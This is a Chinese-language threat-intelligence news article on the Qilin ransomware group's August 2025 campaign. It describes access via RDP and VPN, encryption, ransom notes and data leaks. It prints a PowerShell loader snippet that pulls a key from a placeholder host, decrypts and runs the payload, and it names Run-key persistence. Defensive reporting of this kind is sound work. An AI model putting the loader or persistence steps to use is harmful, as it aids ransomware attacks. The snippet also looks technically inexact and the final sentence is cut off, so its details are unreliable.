2025年8月,勒索软件威胁形势发生了显著变化,麒麟(Qilin)组织宣称对全球104起独立攻击事件负责。
今年早些时候出现的“麒麟”(Qilin)通过激进的双重勒索策略和广泛的附属机构招募策略,迅速巩固了自己的地位。
最初的入侵主要利用了暴露的远程桌面协议(RDP)服务器和面向公众的虚拟专用网络(VPN)网关,使附属机构能够在部署勒索软件有效载荷之前建立立足点。
从制造业到专业服务等各个行业,受害者都报告称遭遇了系统突然加密,随后是数据被盗和勒索要求。
Cyble的8月威胁态势报告不仅强调了“麒麟”攻击的数量,还指出了其工具和攻击活动日益增强的复杂性。
其附属机构利用薄弱的凭证和未修补的漏洞进行初步的侦察。在横向移动后,该组织会执行一个定制的加密二进制文件,旨在攻击网络附加存储共享和关键文件服务器。
麒麟组织宣称的受害者在全球的分布情况显示,该组织的影响力已遍及北美、欧洲和亚洲。
Cyble的分析师指出,Qilin的有效载荷采用了多级加载器,该加载器在运行时使用动态生成的AES密钥对核心勒索软件可执行文件进行解密。
一旦解密,有效载荷会扫描本地文件系统以查找预定义的扩展名(如.docx、.xlsx和.pdf),并应用AES-CTR加密。
文件加密后,Qilin会在每个目录中写入一份勒索信,文件名为README_QILIN.txt。受害者被引导至一个基于Tor的支付门户,并被威胁如果不付款,数据将被公开泄露。
在一些组织无视要求的情况下,“麒麟”(Qilin)的附属机构会在48小时内开始在泄密网站上发布窃取的数据,这加剧了事件响应人员面临的压力。
麒麟(Qilin)行动的迅速升级使其成为8月最为活跃的勒索软件团伙,其活动量几乎是最接近的竞争对手阿基拉(Akira)的两倍。
除了数量庞大之外,麒麟不断升级的工具包——尤其是其加载程序和加密程序——表明它在协同发力以逃避检测并阻碍补救措施的实施。
感染机制与加密流程
麒麟的感染机制始于一个附属机构上传一个恶意ZIP压缩包,该压缩包通常被命名为模仿合法的软件更新。
执行时,一个PowerShell单行命令会在%TEMP%目录中释放并启动一个启动器二进制文件(qlnldr.exe)。该启动器随后会执行以下步骤:-
# Qilin loader snippet: decrypt and execute core ransomware
$encKey = (Invoke-WebRequest "http://malicious[.]site/key").Content
$encryptedPayload = Get-Content "$env:TEMP\qln_core.bin" -AsByteStream
$decrypted = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$decrypted. Key = [Convert]::FromBase64String($encKey)
$decrypted. Mode = 'CTR'
$transform = $decrypted.CreateDecryptor()
$coreBytes = $transform.TransformFinalBlock($encryptedPayload, 0, $encryptedPayload.Length)
[System.IO.File]::WriteAllBytes("$env:TEMP\qilin.exe", $coreBytes)
Start-Process "$env:TEMP\qilin.exe"初始化时,qilin.exe会生成一个独特的AES会话密钥,对映射驱动器上的文件进行加密,并通过HTTPS通道窃取敏感文档。
通过在HKCU\Software\Microsoft\Windows\CurrentVersion\Run注册表项中注册加载程序来实现持久性,确保重启后仍能执行。
虽然加载器的解密序列和注册表持久化机制为了解麒麟的感染链提供了可见性,并有助于防御者制定有针对性的检测规则。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
